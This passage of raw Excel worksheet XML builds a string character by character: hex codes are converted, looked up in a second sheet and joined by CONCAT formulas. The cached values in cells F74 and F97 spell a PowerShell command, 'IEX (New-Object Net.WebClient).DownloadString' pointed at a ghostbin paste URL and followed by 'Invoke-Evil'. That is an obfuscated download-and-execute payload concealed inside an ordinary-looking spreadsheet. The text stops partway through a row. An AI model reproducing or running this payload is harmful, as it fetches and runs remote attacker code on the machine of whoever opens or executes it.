        <f>IF(A45="00",VLOOKUP(C45,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C45,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>l</v>
      </c>
    </row>
    <row r="46" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A46" t="str">
        <f>A45</f>
        <v>00</v>
      </c>
      <c r="B46" s="1" t="s">
        <v>13</v>
      </c>
      <c r="C46">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="D46" t="str">
        <f>IF(A46="00",VLOOKUP(C46,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C46,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>i</v>
      </c>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A47" t="str">
        <f>A46</f>
        <v>00</v>
      </c>
      <c r="B47" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C47">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="D47" t="str">
        <f>IF(A47="00",VLOOKUP(C47,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C47,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>e</v>
      </c>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A48" t="str">
        <f>A47</f>
        <v>00</v>
      </c>
      <c r="B48" s="1" t="s">
        <v>16</v>
      </c>
      <c r="C48">
        <f t="shared" si="2"/>
        <v>17</v>
      </c>
      <c r="D48" t="str">
        <f>IF(A48="00",VLOOKUP(C48,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C48,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>n</v>
      </c>
    </row>
    <row r="49" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A49" t="str">
        <f>A48</f>
        <v>00</v>
      </c>
      <c r="B49" s="1" t="s">
        <v>21</v>
      </c>
      <c r="C49">
        <f t="shared" si="2"/>
        <v>23</v>
      </c>
      <c r="D49" t="str">
        <f>IF(A49="00",VLOOKUP(C49,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C49,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>t</v>
      </c>
    </row>
    <row r="50" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A50" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B50" s="1" t="s">
        <v>23</v>
      </c>
      <c r="C50">
        <f t="shared" si="2"/>
        <v>39</v>
      </c>
      <c r="D50" t="str">
        <f>IF(A50="00",VLOOKUP(C50,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C50,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>)</v>
      </c>
    </row>
    <row r="51" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A51" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B51" s="1" t="s">
        <v>8</v>
      </c>
      <c r="C51">
        <f t="shared" si="2"/>
        <v>55</v>
      </c>
      <c r="D51" t="str">
        <f>IF(A51="00",VLOOKUP(C51,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C51,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>PERIOD</v>
      </c>
    </row>
    <row r="52" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A52" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B52" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C52">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="D52" t="str">
        <f>IF(A52="00",VLOOKUP(C52,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C52,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>D</v>
      </c>
    </row>
    <row r="53" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A53" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B53" s="1" t="s">
        <v>2</v>
      </c>
      <c r="C53">
        <f t="shared" si="2"/>
        <v>18</v>
      </c>
      <c r="D53" t="str">
        <f>IF(A53="00",VLOOKUP(C53,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C53,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>o</v>
      </c>
    </row>
    <row r="54" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A54" t="str">
        <f t="shared" ref="A54:A65" si="5">A53</f>
        <v>00</v>
      </c>
      <c r="B54" s="1" t="s">
        <v>0</v>
      </c>
      <c r="C54">
        <f t="shared" si="2"/>
        <v>26</v>
      </c>
      <c r="D54" t="str">
        <f>IF(A54="00",VLOOKUP(C54,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C54,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>w</v>
      </c>
    </row>
    <row r="55" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A55" t="str">
        <f t="shared" si="5"/>
        <v>00</v>
      </c>
      <c r="B55" s="1" t="s">
        <v>16</v>
      </c>
      <c r="C55">
        <f t="shared" si="2"/>
        <v>17</v>
      </c>
      <c r="D55" t="str">
        <f>IF(A55="00",VLOOKUP(C55,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C55,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>n</v>
      </c>
    </row>
    <row r="56" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A56" t="str">
        <f t="shared" si="5"/>
        <v>00</v>
      </c>
      <c r="B56" s="1" t="s">
        <v>7</v>
      </c>
      <c r="C56">
        <f t="shared" si="2"/>
        <v>15</v>
      </c>
      <c r="D56" t="str">
        <f>IF(A56="00",VLOOKUP(C56,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C56,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>l</v>
      </c>
    </row>
    <row r="57" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A57" t="str">
        <f t="shared" si="5"/>
        <v>00</v>
      </c>
      <c r="B57" s="1" t="s">
        <v>2</v>
      </c>
      <c r="C57">
        <f t="shared" si="2"/>
        <v>18</v>
      </c>
      <c r="D57" t="str">
        <f>IF(A57="00",VLOOKUP(C57,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C57,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>o</v>
      </c>
    </row>
    <row r="58" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A58" t="str">
        <f t="shared" si="5"/>
        <v>00</v>
      </c>
      <c r="B58" s="1" t="s">
        <v>25</v>
      </c>
      <c r="C58">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="D58" t="str">
        <f>IF(A58="00",VLOOKUP(C58,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C58,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>a</v>
      </c>
    </row>
    <row r="59" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A59" t="str">
        <f t="shared" si="5"/>
        <v>00</v>
      </c>
      <c r="B59" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C59">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="D59" t="str">
        <f>IF(A59="00",VLOOKUP(C59,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C59,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>d</v>
      </c>
    </row>
    <row r="60" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A60" t="str">
        <f t="shared" si="5"/>
        <v>00</v>
      </c>
      <c r="B60" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C60">
        <f t="shared" si="2"/>
        <v>22</v>
      </c>
      <c r="D60" t="str">
        <f>IF(A60="00",VLOOKUP(C60,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C60,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>s</v>
      </c>
    </row>
    <row r="61" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A61" t="str">
        <f t="shared" si="5"/>
        <v>00</v>
      </c>
      <c r="B61" s="1" t="s">
        <v>21</v>
      </c>
      <c r="C61">
        <f t="shared" si="2"/>
        <v>23</v>
      </c>
      <c r="D61" t="str">
        <f>IF(A61="00",VLOOKUP(C61,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C61,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>t</v>
      </c>
    </row>
    <row r="62" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A62" t="str">
        <f t="shared" si="5"/>
        <v>00</v>
      </c>
      <c r="B62" s="1" t="s">
        <v>5</v>
      </c>
      <c r="C62">
        <f t="shared" si="2"/>
        <v>21</v>
      </c>
      <c r="D62" t="str">
        <f>IF(A62="00",VLOOKUP(C62,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C62,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>r</v>
      </c>
    </row>
    <row r="63" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A63" t="str">
        <f t="shared" si="5"/>
        <v>00</v>
      </c>
      <c r="B63" s="1" t="s">
        <v>13</v>
      </c>
      <c r="C63">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="D63" t="str">
        <f>IF(A63="00",VLOOKUP(C63,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C63,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>i</v>
      </c>
    </row>
    <row r="64" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A64" t="str">
        <f t="shared" si="5"/>
        <v>00</v>
      </c>
      <c r="B64" s="1" t="s">
        <v>16</v>
      </c>
      <c r="C64">
        <f t="shared" si="2"/>
        <v>17</v>
      </c>
      <c r="D64" t="str">
        <f>IF(A64="00",VLOOKUP(C64,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C64,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>n</v>
      </c>
    </row>
    <row r="65" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A65" t="str">
        <f t="shared" si="5"/>
        <v>00</v>
      </c>
      <c r="B65" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C65">
        <f t="shared" si="2"/>
        <v>10</v>
      </c>
      <c r="D65" t="str">
        <f>IF(A65="00",VLOOKUP(C65,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C65,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>g</v>
      </c>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A66" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B66" s="1" t="s">
        <v>15</v>
      </c>
      <c r="C66">
        <f t="shared" si="2"/>
        <v>38</v>
      </c>
      <c r="D66" t="str">
        <f>IF(A66="00",VLOOKUP(C66,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C66,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>(</v>
      </c>
    </row>
    <row r="67" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A67" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B67" s="1" t="s">
        <v>4</v>
      </c>
      <c r="C67">
        <f t="shared" si="2"/>
        <v>11</v>
      </c>
      <c r="D67" t="str">
        <f>IF(A67="00",VLOOKUP(C67,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C67,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>h</v>
      </c>
    </row>
    <row r="68" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A68" t="str">
        <f t="shared" ref="A68:A70" si="6">A67</f>
        <v>00</v>
      </c>
      <c r="B68" s="1" t="s">
        <v>21</v>
      </c>
      <c r="C68">
        <f t="shared" si="2"/>
        <v>23</v>
      </c>
      <c r="D68" t="str">
        <f>IF(A68="00",VLOOKUP(C68,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C68,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>t</v>
      </c>
    </row>
    <row r="69" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A69" t="str">
        <f t="shared" si="6"/>
        <v>00</v>
      </c>
      <c r="B69" s="1" t="s">
        <v>21</v>
      </c>
      <c r="C69">
        <f t="shared" si="2"/>
        <v>23</v>
      </c>
      <c r="D69" t="str">
        <f>IF(A69="00",VLOOKUP(C69,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C69,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>t</v>
      </c>
    </row>
    <row r="70" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A70" t="str">
        <f t="shared" si="6"/>
        <v>00</v>
      </c>
      <c r="B70" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C70">
        <f t="shared" si="2"/>
        <v>19</v>
      </c>
      <c r="D70" t="str">
        <f>IF(A70="00",VLOOKUP(C70,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C70,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>p</v>
      </c>
    </row>
    <row r="71" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A71" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B71" s="1" t="s">
        <v>27</v>
      </c>
      <c r="C71">
        <f t="shared" si="2"/>
        <v>51</v>
      </c>
      <c r="D71" t="str">
        <f>IF(A71="00",VLOOKUP(C71,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C71,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>:</v>
      </c>
    </row>
    <row r="72" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A72" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B72" s="1" t="s">
        <v>28</v>
      </c>
      <c r="C72">
        <f t="shared" si="2"/>
        <v>56</v>
      </c>
      <c r="D72" t="str">
        <f>IF(A72="00",VLOOKUP(C72,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C72,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>/</v>
      </c>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A73" t="str">
        <f t="shared" ref="A73:A97" si="7">A72</f>
        <v>00</v>
      </c>
      <c r="B73" s="1" t="s">
        <v>28</v>
      </c>
      <c r="C73">
        <f t="shared" si="2"/>
        <v>56</v>
      </c>
      <c r="D73" t="str">
        <f>IF(A73="00",VLOOKUP(C73,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C73,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>/</v>
      </c>
    </row>
    <row r="74" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A74" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B74" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C74">
        <f t="shared" si="2"/>
        <v>10</v>
      </c>
      <c r="D74" t="str">
        <f>IF(A74="00",VLOOKUP(C74,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C74,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>g</v>
      </c>
      <c r="F74" t="str">
        <f>_xlfn.CONCAT(F34, D74:D81, ".", D83:D96)</f>
        <v>powershell.exe \"IEX (New-Object Net.WebCclient).Downloadstring(http://ghostbin.co/paste/czboh</v>
      </c>
    </row>
    <row r="75" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A75" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B75" s="1" t="s">
        <v>4</v>
      </c>
      <c r="C75">
        <f t="shared" si="2"/>
        <v>11</v>
      </c>
      <c r="D75" t="str">
        <f>IF(A75="00",VLOOKUP(C75,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C75,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>h</v>
      </c>
    </row>
    <row r="76" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A76" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B76" s="1" t="s">
        <v>2</v>
      </c>
      <c r="C76">
        <f t="shared" si="2"/>
        <v>18</v>
      </c>
      <c r="D76" t="str">
        <f>IF(A76="00",VLOOKUP(C76,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C76,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>o</v>
      </c>
    </row>
    <row r="77" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A77" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B77" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C77">
        <f t="shared" si="2"/>
        <v>22</v>
      </c>
      <c r="D77" t="str">
        <f>IF(A77="00",VLOOKUP(C77,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C77,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>s</v>
      </c>
    </row>
    <row r="78" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A78" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B78" s="1" t="s">
        <v>21</v>
      </c>
      <c r="C78">
        <f t="shared" si="2"/>
        <v>23</v>
      </c>
      <c r="D78" t="str">
        <f>IF(A78="00",VLOOKUP(C78,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C78,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>t</v>
      </c>
    </row>
    <row r="79" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A79" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B79" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C79">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="D79" t="str">
        <f>IF(A79="00",VLOOKUP(C79,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C79,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>b</v>
      </c>
    </row>
    <row r="80" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A80" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B80" s="1" t="s">
        <v>13</v>
      </c>
      <c r="C80">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="D80" t="str">
        <f>IF(A80="00",VLOOKUP(C80,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C80,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>i</v>
      </c>
    </row>
    <row r="81" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A81" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B81" s="1" t="s">
        <v>16</v>
      </c>
      <c r="C81">
        <f t="shared" ref="C81:C127" si="8">HEX2DEC(B81)</f>
        <v>17</v>
      </c>
      <c r="D81" t="str">
        <f>IF(A81="00",VLOOKUP(C81,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C81,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>n</v>
      </c>
    </row>
    <row r="82" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A82" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B82" s="1" t="s">
        <v>8</v>
      </c>
      <c r="C82">
        <f t="shared" si="8"/>
        <v>55</v>
      </c>
      <c r="D82" t="str">
        <f>IF(A82="00",VLOOKUP(C82,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C82,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>PERIOD</v>
      </c>
    </row>
    <row r="83" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A83" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B83" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C83">
        <f t="shared" si="8"/>
        <v>6</v>
      </c>
      <c r="D83" t="str">
        <f>IF(A83="00",VLOOKUP(C83,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C83,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>c</v>
      </c>
    </row>
    <row r="84" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A84" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B84" s="1" t="s">
        <v>2</v>
      </c>
      <c r="C84">
        <f t="shared" si="8"/>
        <v>18</v>
      </c>
      <c r="D84" t="str">
        <f>IF(A84="00",VLOOKUP(C84,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C84,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>o</v>
      </c>
    </row>
    <row r="85" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A85" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B85" s="1" t="s">
        <v>28</v>
      </c>
      <c r="C85">
        <f t="shared" si="8"/>
        <v>56</v>
      </c>
      <c r="D85" t="str">
        <f>IF(A85="00",VLOOKUP(C85,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C85,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>/</v>
      </c>
    </row>
    <row r="86" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A86" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B86" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C86">
        <f t="shared" si="8"/>
        <v>19</v>
      </c>
      <c r="D86" t="str">
        <f>IF(A86="00",VLOOKUP(C86,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C86,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>p</v>
      </c>
    </row>
    <row r="87" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A87" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B87" s="1" t="s">
        <v>25</v>
      </c>
      <c r="C87">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="D87" t="str">
        <f>IF(A87="00",VLOOKUP(C87,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C87,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>a</v>
      </c>
    </row>
    <row r="88" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A88" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B88" s="1" t="s">
        <v>6</v>
      </c>
      <c r="C88">
        <f t="shared" si="8"/>
        <v>22</v>
      </c>
      <c r="D88" t="str">
        <f>IF(A88="00",VLOOKUP(C88,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C88,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>s</v>
      </c>
    </row>
    <row r="89" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A89" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B89" s="1" t="s">
        <v>21</v>
      </c>
      <c r="C89">
        <f t="shared" si="8"/>
        <v>23</v>
      </c>
      <c r="D89" t="str">
        <f>IF(A89="00",VLOOKUP(C89,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C89,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>t</v>
      </c>
    </row>
    <row r="90" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A90" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B90" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C90">
        <f t="shared" si="8"/>
        <v>8</v>
      </c>
      <c r="D90" t="str">
        <f>IF(A90="00",VLOOKUP(C90,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C90,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>e</v>
      </c>
    </row>
    <row r="91" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A91" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B91" s="1" t="s">
        <v>28</v>
      </c>
      <c r="C91">
        <f t="shared" si="8"/>
        <v>56</v>
      </c>
      <c r="D91" t="str">
        <f>IF(A91="00",VLOOKUP(C91,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C91,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>/</v>
      </c>
    </row>
    <row r="92" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A92" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B92" s="1" t="s">
        <v>20</v>
      </c>
      <c r="C92">
        <f t="shared" si="8"/>
        <v>6</v>
      </c>
      <c r="D92" t="str">
        <f>IF(A92="00",VLOOKUP(C92,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C92,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>c</v>
      </c>
    </row>
    <row r="93" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A93" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B93" s="1" t="s">
        <v>29</v>
      </c>
      <c r="C93">
        <f t="shared" si="8"/>
        <v>29</v>
      </c>
      <c r="D93" t="str">
        <f>IF(A93="00",VLOOKUP(C93,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C93,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>z</v>
      </c>
    </row>
    <row r="94" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A94" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B94" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C94">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="D94" t="str">
        <f>IF(A94="00",VLOOKUP(C94,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C94,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>b</v>
      </c>
    </row>
    <row r="95" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A95" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B95" s="1" t="s">
        <v>2</v>
      </c>
      <c r="C95">
        <f t="shared" si="8"/>
        <v>18</v>
      </c>
      <c r="D95" t="str">
        <f>IF(A95="00",VLOOKUP(C95,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C95,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>o</v>
      </c>
    </row>
    <row r="96" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A96" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B96" s="1" t="s">
        <v>4</v>
      </c>
      <c r="C96">
        <f t="shared" si="8"/>
        <v>11</v>
      </c>
      <c r="D96" t="str">
        <f>IF(A96="00",VLOOKUP(C96,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C96,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>h</v>
      </c>
    </row>
    <row r="97" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A97" t="str">
        <f t="shared" si="7"/>
        <v>00</v>
      </c>
      <c r="B97" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C97">
        <f t="shared" si="8"/>
        <v>52</v>
      </c>
      <c r="D97" t="str">
        <f>IF(A97="00",VLOOKUP(C97,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C97,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>QUOTE</v>
      </c>
      <c r="F97" t="str">
        <f>_xlfn.CONCAT(F74, "'", D98, D99, " ", D101:D111)</f>
        <v>powershell.exe \"IEX (New-Object Net.WebCclient).Downloadstring(http://ghostbin.co/paste/czboh'); Invoke-Evil</v>
      </c>
    </row>
    <row r="98" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A98" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B98" s="1" t="s">
        <v>23</v>
      </c>
      <c r="C98">
        <f t="shared" si="8"/>
        <v>39</v>
      </c>
      <c r="D98" t="str">
        <f>IF(A98="00",VLOOKUP(C98,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C98,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>)</v>
      </c>
    </row>
    <row r="99" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A99" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B99" s="1" t="s">
        <v>27</v>
      </c>
      <c r="C99">
        <f t="shared" si="8"/>
        <v>51</v>
      </c>
      <c r="D99" t="str">
        <f>IF(A99="00",VLOOKUP(C99,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C99,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>;</v>
      </c>
    </row>
    <row r="100" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A100" t="str">
        <f>A99</f>
        <v>00</v>
      </c>
      <c r="B100" s="1" t="s">
        <v>10</v>
      </c>
      <c r="C100">
        <f t="shared" si="8"/>
        <v>44</v>
      </c>
      <c r="D100" t="str">
        <f>IF(A100="00",VLOOKUP(C100,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C100,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>SPACE</v>
      </c>
    </row>
    <row r="101" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A101" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B101" s="1" t="s">
        <v>13</v>
      </c>
      <c r="C101">
        <f t="shared" si="8"/>
        <v>12</v>
      </c>
      <c r="D101" t="str">
        <f>IF(A101="00",VLOOKUP(C101,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C101,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>I</v>
      </c>
    </row>
    <row r="102" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A102" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B102" s="1" t="s">
        <v>16</v>
      </c>
      <c r="C102">
        <f t="shared" si="8"/>
        <v>17</v>
      </c>
      <c r="D102" t="str">
        <f>IF(A102="00",VLOOKUP(C102,Sheet2!$A$1:$C$100,2,FALSE), VLOOKUP(C102,Sheet2!$A$1:$C$100,3,FALSE))</f>
        <v>n</v>
      </c>
    </row>
    <row r="103" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A103" t="str">
        <f>A102</f>
        <v>00</v>
      </c>
      <c r="B103" s="1" t="s">
        <v>30</v>
